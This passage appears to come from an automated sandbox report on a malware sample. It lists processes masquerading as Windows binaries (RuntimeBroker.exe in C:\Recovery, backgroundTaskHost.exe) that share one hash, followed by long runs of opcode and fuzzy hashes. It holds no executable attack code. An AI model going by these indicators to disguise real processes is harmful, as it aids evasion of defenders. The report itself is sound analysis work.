                                                                                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:49
                                                                                                            Start time:18:42:12
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Recovery\RuntimeBroker.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Recovery\RuntimeBroker.exe"
                                                                                                            Imagebase:0xc0000
                                                                                                            File size:1'991'680 bytes
                                                                                                            MD5 hash:B379F4AC167609D8A3EF26444098B61D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:false

                                                                                                            Target ID:50
                                                                                                            Start time:18:42:13
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Recovery\RuntimeBroker.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Recovery\RuntimeBroker.exe"
                                                                                                            Imagebase:0x250000
                                                                                                            File size:1'991'680 bytes
                                                                                                            MD5 hash:B379F4AC167609D8A3EF26444098B61D
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:52
                                                                                                            Start time:18:42:17
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                            Imagebase:0x7ff6eef20000
                                                                                                            File size:55'320 bytes
                                                                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:false

                                                                                                            Target ID:54
                                                                                                            Start time:18:42:21
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:55
                                                                                                            Start time:18:42:45
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe"
                                                                                                            Imagebase:0x60000
                                                                                                            File size:1'991'680 bytes
                                                                                                            MD5 hash:B379F4AC167609D8A3EF26444098B61D
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true


                                                                                                              Execution Graph

                                                                                                              Execution Coverage:7.9%
                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                              Signature Coverage:0%
                                                                                                              Total number of Nodes:4
                                                                                                              Total number of Limit Nodes:0
                                                                                                              execution_graph 7971 7ffd9bbef8d8 7973 7ffd9bbef8cc 7971->7973 7972 7ffd9bbefa26 QueryFullProcessImageNameA 7974 7ffd9bbefa84 7972->7974 7973->7971 7973->7972

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1869466612.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9bbe0000_s5duotgoYD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FullImageNameProcessQuery
                                                                                                              • String ID:
                                                                                                              • API String ID: 3578328331-0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844926246.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b7e0000_s5duotgoYD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 43fce7960257936479fb2833162a0c14f19baa53eefe1b97cda385da6e38db9a
                                                                                                              • Instruction ID: ade99f7b8e049fda9def40aed7c7a676ee03b9a85df2e5430b74c8164400ad5b
                                                                                                              • Opcode Fuzzy Hash: 43fce7960257936479fb2833162a0c14f19baa53eefe1b97cda385da6e38db9a
                                                                                                              • Instruction Fuzzy Hash: 07415612F0CAA90EE318F6B860AA6FDB7D1DF89329B1545FBD04EC71F7CD0868418280
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844926246.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b7e0000_s5duotgoYD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fdbfbd65e2a7a1b6a3c896732a2a3714cb47cea0e7f12a5fc5371ab07eb3d296
                                                                                                              • Instruction ID: d55fb7fdd370a46c174a365ae055d91078b4c27d3ba399af7802076f2112a2b6
                                                                                                              • Opcode Fuzzy Hash: fdbfbd65e2a7a1b6a3c896732a2a3714cb47cea0e7f12a5fc5371ab07eb3d296
                                                                                                              • Instruction Fuzzy Hash: 83312822F1CA5D0FE358F66C646AAB873C2DF88329B1545FAE40EC32F7CD18AC414284
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844926246.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b7e0000_s5duotgoYD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1169f637882b4b75ba287b1405451753b3542bd56f1eae9b3b1aef322801d59a
                                                                                                              • Instruction ID: 74b4dc0d2919d068da94b4bf54f692214b37cfe194413269ee6551896e81b126
                                                                                                              • Opcode Fuzzy Hash: 1169f637882b4b75ba287b1405451753b3542bd56f1eae9b3b1aef322801d59a
                                                                                                              • Instruction Fuzzy Hash: 2D21F920B29E5D0FE798F66C946A779B3C2EF99315B5101B9E80EC32F6DD18AD418281
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844926246.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b7e0000_s5duotgoYD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7bb253b544996ab9998cf0409db10d1bd5c1e622dee68b72ffb353e2c4c01a24
                                                                                                              • Instruction ID: 93c47d8510a46b6fccf4da36a0a86be6ca2f095440e949944101a00e014b2b10
                                                                                                              • Opcode Fuzzy Hash: 7bb253b544996ab9998cf0409db10d1bd5c1e622dee68b72ffb353e2c4c01a24
                                                                                                              • Instruction Fuzzy Hash: 68314130A0D64E8FDB59EB64C8659A97BF1EF56300B0545BAD009D72B2DA38A940C751
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844926246.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b7e0000_s5duotgoYD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 25f007c1076655979b4ea188fa1fb5b6bcda6bb3a7e8b6b7ed6e38361a54807b
                                                                                                              • Instruction ID: 218f13d917c41c26bc4e9a7142132fdb966d259e2f3c0769315685cca442a840
                                                                                                              • Opcode Fuzzy Hash: 25f007c1076655979b4ea188fa1fb5b6bcda6bb3a7e8b6b7ed6e38361a54807b
                                                                                                              • Instruction Fuzzy Hash: CA21B431A0D78D8FE721DBA8C8662DC7BB0EF42314F1646B7D0448B1F2D9382649CB51
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844926246.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b7e0000_s5duotgoYD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7834f599f75801e23d7f69187ef66a0a98407cf1cd7bd36354b00dccc6904913
                                                                                                              • Instruction ID: 21bfbbbeb07941d0d64601331a5e6a601d3897f01896b794b0f98ad158d19c43
                                                                                                              • Opcode Fuzzy Hash: 7834f599f75801e23d7f69187ef66a0a98407cf1cd7bd36354b00dccc6904913
                                                                                                              • Instruction Fuzzy Hash: 8C218E78918AA98EE348DF18C4697A57FE0FB55319F00007FC069D37D5C7B91165C780
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844926246.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b7e0000_s5duotgoYD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8a6922e84096443d27bd2dd66a3e0869015020bda7e372c633f4a85d441cedc6
                                                                                                              • Instruction ID: 1ec36b26d89ac275ef26c6c454b2d8ade72d4e39b293340a98f0366c8d57bb29
                                                                                                              • Opcode Fuzzy Hash: 8a6922e84096443d27bd2dd66a3e0869015020bda7e372c633f4a85d441cedc6
                                                                                                              • Instruction Fuzzy Hash: A3211230A19A0D8FDBA4DB44C8A1BB973A1FF94304F5542A9D00ED72B1CE39AF85CB41
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844926246.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b7e0000_s5duotgoYD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 07435a59b6db558c25f55a46f1885c53bffe0cb7ac867ea66af376fd7077fae8
                                                                                                              • Instruction ID: 54e2d48fc58adf7fa0cfeb366f545fcd67fe2dd37fa18524903579d3b1973547
                                                                                                              • Opcode Fuzzy Hash: 07435a59b6db558c25f55a46f1885c53bffe0cb7ac867ea66af376fd7077fae8
                                                                                                              • Instruction Fuzzy Hash: DD119E32F0DA5A0BE7A4E66888297B971D2EFC8350F4503B9E40DC32F6ED287A404281
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844926246.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b7e0000_s5duotgoYD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a5b5987c751e1250b6c6834f3186cf0bb9a5fb9566fd53efbd67c341c5d28357
                                                                                                              • Instruction ID: 25ebbd008791bb36e669af6b3845632b1ed33a714447e885ea13b986974edc25
                                                                                                              • Opcode Fuzzy Hash: a5b5987c751e1250b6c6834f3186cf0bb9a5fb9566fd53efbd67c341c5d28357
                                                                                                              • Instruction Fuzzy Hash: F2111E31F0EB5E4AFBB4E7988866BB87291AF44710F5702B6D41DD36F2DD286E804641
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844926246.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b7e0000_s5duotgoYD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2a99b9b467763cd1490fcc258269645f29eed202e1eb2df8673a3c4c40eead7e
                                                                                                              • Instruction ID: c2a6bf3126bc0a2b3278b7f7380232d4427c6a59a0c8b7c31dfce5a6e3fb920f
                                                                                                              • Opcode Fuzzy Hash: 2a99b9b467763cd1490fcc258269645f29eed202e1eb2df8673a3c4c40eead7e
                                                                                                              • Instruction Fuzzy Hash: 5D11AC31A0D78D8FE702EBA898652D97BB0AF42214F0646B7C084DB2F2D53826498790
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844926246.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b7e0000_s5duotgoYD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5429b08621baa0f981f2692b84ad514aad6b6200f07fb1f1ea5724211c42616c
                                                                                                              • Instruction ID: 78edf9a3a37b96830f495d1c97c8d94051cac376bb626bb425d2872484f23846
                                                                                                              • Opcode Fuzzy Hash: 5429b08621baa0f981f2692b84ad514aad6b6200f07fb1f1ea5724211c42616c
                                                                                                              • Instruction Fuzzy Hash: F7019E31A0D3888FD702DBA4D8546D97FB0AF42214F1646E7C044DB2B2D5346648C751
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844926246.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b7e0000_s5duotgoYD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e49ac10e7f4e2ed11dc9fc9324b79853f4bb7ec216eec6755fa3f80e90954fac
                                                                                                              • Instruction ID: df8853f8ead5a5eaf70c7449aa3033da58bdb02c27a886edb123bdbd68427a1c
                                                                                                              • Opcode Fuzzy Hash: e49ac10e7f4e2ed11dc9fc9324b79853f4bb7ec216eec6755fa3f80e90954fac
                                                                                                              • Instruction Fuzzy Hash: 83F0E131B49A5F8BEB74EA54C865BF87261EF54310F1702B5C40DD35B1DE386E818B40
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844926246.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b7e0000_s5duotgoYD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6aa21694ba470f1aeb6bedcf5706241dbc561a53f8d765239a09f90196de1287
                                                                                                              • Instruction ID: 69df6e8bced9d42e54f308614123e1f851abddcd3edcd3225d94e54de39e149e
                                                                                                              • Opcode Fuzzy Hash: 6aa21694ba470f1aeb6bedcf5706241dbc561a53f8d765239a09f90196de1287
                                                                                                              • Instruction Fuzzy Hash: 1D01AD30A0E3898FD702EBB488546DDBFB0AF02304F1546E7C444DB2B7D9386648C751
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844926246.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b7e0000_s5duotgoYD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5d9321e5b0ce7b80bcc98df1fb9cdba77fac917103449e8ec2efa1fa7c61ec28
                                                                                                              • Instruction ID: 292cf4cb391678e2c23141bf32a4e744cd2eac708a3a5159dbcfbef2a51f1684
                                                                                                              • Opcode Fuzzy Hash: 5d9321e5b0ce7b80bcc98df1fb9cdba77fac917103449e8ec2efa1fa7c61ec28
                                                                                                              • Instruction Fuzzy Hash: 5FE01220E0A51E47FBB49648CC61BA97264EF58300F5542B8D50FA33F1CD3CAF858745
                                                                                                              Memory Dump Source
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000032.00000002.2191901724.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_50_2_7ffd9b7d0000_RuntimeBroker.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 25de3e68ff6d02ffd1405aad5810a49d3d55cc5bb66181c82c4d4e87300a91a4
                                                                                                              • Instruction ID: 9f5290afb62f884bf008680f3d1df2706dc5a2ef11ed2502b72ab083918d7e2c
                                                                                                              • Opcode Fuzzy Hash: 25de3e68ff6d02ffd1405aad5810a49d3d55cc5bb66181c82c4d4e87300a91a4
                                                                                                              • Instruction Fuzzy Hash: CF91F076A19A898FE75ADF6888797A97FE0EFA5310F0401BED049C73E2CA781845C740
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000032.00000002.2191901724.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_50_2_7ffd9b7d0000_RuntimeBroker.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0613a7e3c078aa6166850929b98cd69ef85dad92d03adef61d45f6422dc8c471
                                                                                                              • Instruction ID: 99357cb801bf5a7cc56a1078f38464fdc2cef917cac2e42ee7197cc5aa2e4296
                                                                                                              • Opcode Fuzzy Hash: 0613a7e3c078aa6166850929b98cd69ef85dad92d03adef61d45f6422dc8c471
                                                                                                              • Instruction Fuzzy Hash: 46410416F1C6990AE308F7B860A9AFC7791EF89329B1546BAD04EC61E7DD1868818281
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000032.00000002.2191901724.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_50_2_7ffd9b7d0000_RuntimeBroker.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c4255f08aa6773782e7d2397dd1b6cd3ff65e8eb450539e001132177cb85df29
                                                                                                              • Instruction ID: 94aafce7d08da926a415a900c00593b18a2589bec79b814b100a6f27df67375c
                                                                                                              • Opcode Fuzzy Hash: c4255f08aa6773782e7d2397dd1b6cd3ff65e8eb450539e001132177cb85df29
                                                                                                              • Instruction Fuzzy Hash: B1310912F1CA5D0FE758F66C746AAB873C6EFC8365B5546BAE40EC31E7DC18AC414280
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000032.00000002.2191901724.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_50_2_7ffd9b7d0000_RuntimeBroker.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 75705b75a0e622ed4f0a6e81b87bd81734e9d6c743ff7a030c4794f121047f1e
                                                                                                              • Instruction ID: 012b8047699f1f6cf611616fbe6e7330ef608e8b0de259d257f9d537779f9cab
                                                                                                              • Opcode Fuzzy Hash: 75705b75a0e622ed4f0a6e81b87bd81734e9d6c743ff7a030c4794f121047f1e
                                                                                                              • Instruction Fuzzy Hash: D721FC20F19A1D0FE758E76C946A77976C6EFD8351B5502BDE40EC32F6DD18AC414281
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000032.00000002.2191901724.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_50_2_7ffd9b7d0000_RuntimeBroker.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 05a68afa6f71b823817782456a8800b9cdc964da62c8fb56d43b51e5ec6f45e5
                                                                                                              • Instruction ID: d710bbd16dd851c7bbae960e1e2a59b3abdf94bc4f85237ce7c85337ec0fe405
                                                                                                              • Opcode Fuzzy Hash: 05a68afa6f71b823817782456a8800b9cdc964da62c8fb56d43b51e5ec6f45e5
                                                                                                              • Instruction Fuzzy Hash: 3A319330A0D64E8FDB46EB64C8649B97BF0EF96340F0546BBD009D72F2DA39A944CB50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000032.00000002.2191901724.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_50_2_7ffd9b7d0000_RuntimeBroker.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5a75dae402eded833b6b717ae9dfad9162d3ec91cf26db18156d53c56a66070e
                                                                                                              • Instruction ID: e09d5de10409d928f6969a7b1ce751835427d048879ea2252dd0e57be528acd3
                                                                                                              • Opcode Fuzzy Hash: 5a75dae402eded833b6b717ae9dfad9162d3ec91cf26db18156d53c56a66070e
                                                                                                              • Instruction Fuzzy Hash: 4F210635A0D78D8FE721DBA4C4342EC7BA0EF81354F4647BBC0488B1E2D9382689CB51
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000032.00000002.2191901724.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_50_2_7ffd9b7d0000_RuntimeBroker.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: db64c34fbbba1f0c99e9a0d22a350861581b5332b57be307ef0fc18218a217f6
                                                                                                              • Instruction ID: b082fb950f59e28b5a5422c46cf685585ae6fed36980775b56c76d50c287d456
                                                                                                              • Opcode Fuzzy Hash: db64c34fbbba1f0c99e9a0d22a350861581b5332b57be307ef0fc18218a217f6
                                                                                                              • Instruction Fuzzy Hash: 12210330A1960D8FDBA4DB44C460BAD73A1FFD4340F5546A9D00ED72B1DE39AE85DB41
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000032.00000002.2191901724.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_50_2_7ffd9b7d0000_RuntimeBroker.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7e6d9a58630a6bf498a63300a88ff194c334d24a20a7f4fc75e7d54b4f1d7567
                                                                                                              • Instruction ID: 17f5476ba9001d0954ddb6d4217ac638d1a2c9ec2947518c53904860a98ee6ae
                                                                                                              • Opcode Fuzzy Hash: 7e6d9a58630a6bf498a63300a88ff194c334d24a20a7f4fc75e7d54b4f1d7567
                                                                                                              • Instruction Fuzzy Hash: 8F11C631F0D65E4BE7A4EB6898257B9B1D2EBC8390F0507B9E40DD32E6DD1C69484381
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000032.00000002.2191901724.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_50_2_7ffd9b7d0000_RuntimeBroker.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ab858236e7dff6e686aef2ac31bdfe2cfb79e6b0048f523e0f1a536342c05c0f
                                                                                                              • Instruction ID: bcde1fe6af7c7879108159fb4ffe9971d8819e2c058f75e9790a653343f3f49b
                                                                                                              • Opcode Fuzzy Hash: ab858236e7dff6e686aef2ac31bdfe2cfb79e6b0048f523e0f1a536342c05c0f
                                                                                                              • Instruction Fuzzy Hash: 2D113721F0A65E4AE7B4E7988874BB83291EFC4350F5713B6D80DD35F1DD286A888641
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000032.00000002.2191901724.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_50_2_7ffd9b7d0000_RuntimeBroker.jbxd
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000037.00000002.2478867385.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_55_2_7ffd9b7f0000_backgroundTaskHost.jbxd
                                                                                                              • Instruction Fuzzy Hash: 7D214830B0990D8FDBA4DB44C460BA977A1FF94304F9541A9D00ED72B1CE35AEC5DB85
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000037.00000002.2478867385.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_55_2_7ffd9b7f0000_backgroundTaskHost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2481098f12af5d40a64240396f7c88b43d0ce95c60fabf980847dbe2f25e26bd
                                                                                                              • Instruction ID: fc674d183ef3de8afb1e8c07bdd9a4c27ff53d948b2ff58ac9b3d3391a1df860
                                                                                                              • Opcode Fuzzy Hash: 2481098f12af5d40a64240396f7c88b43d0ce95c60fabf980847dbe2f25e26bd
                                                                                                              • Instruction Fuzzy Hash: A3117331F0D65A4BE7A4E76898657B979D2EF88350F0503B5E40DC32F6DD19A94043C6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000037.00000002.2478867385.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_55_2_7ffd9b7f0000_backgroundTaskHost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6246985b57183972333230dff825af188b0e4f3aefa5c0f7c7029f10156ee3f5
                                                                                                              • Instruction ID: cc67e051d01ba21ce91901ab4fc2cbd93b6f912a75d486259d7ee0841c25ef3e
                                                                                                              • Opcode Fuzzy Hash: 6246985b57183972333230dff825af188b0e4f3aefa5c0f7c7029f10156ee3f5
                                                                                                              • Instruction Fuzzy Hash: 1C113321F0E65E4AE7B4EA988864BB83691EF45310F5702B6D40DD76F2DD286A4046C5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000037.00000002.2478867385.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_55_2_7ffd9b7f0000_backgroundTaskHost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4783662381dcd71a9815db07534482895ac7faa8ac6bb84c38932820ab62e8cc
                                                                                                              • Instruction ID: d80a4493df2188df8318f17a04afe3c8763d32d1667896b8809d65ff243409e3
                                                                                                              • Opcode Fuzzy Hash: 4783662381dcd71a9815db07534482895ac7faa8ac6bb84c38932820ab62e8cc
                                                                                                              • Instruction Fuzzy Hash: 3E11A031B0D78D8FE712DFA498542DD7FB0EB42214F0646F7C044DB2A2D9381605CB94
                                                                                                              Memory Dump Source
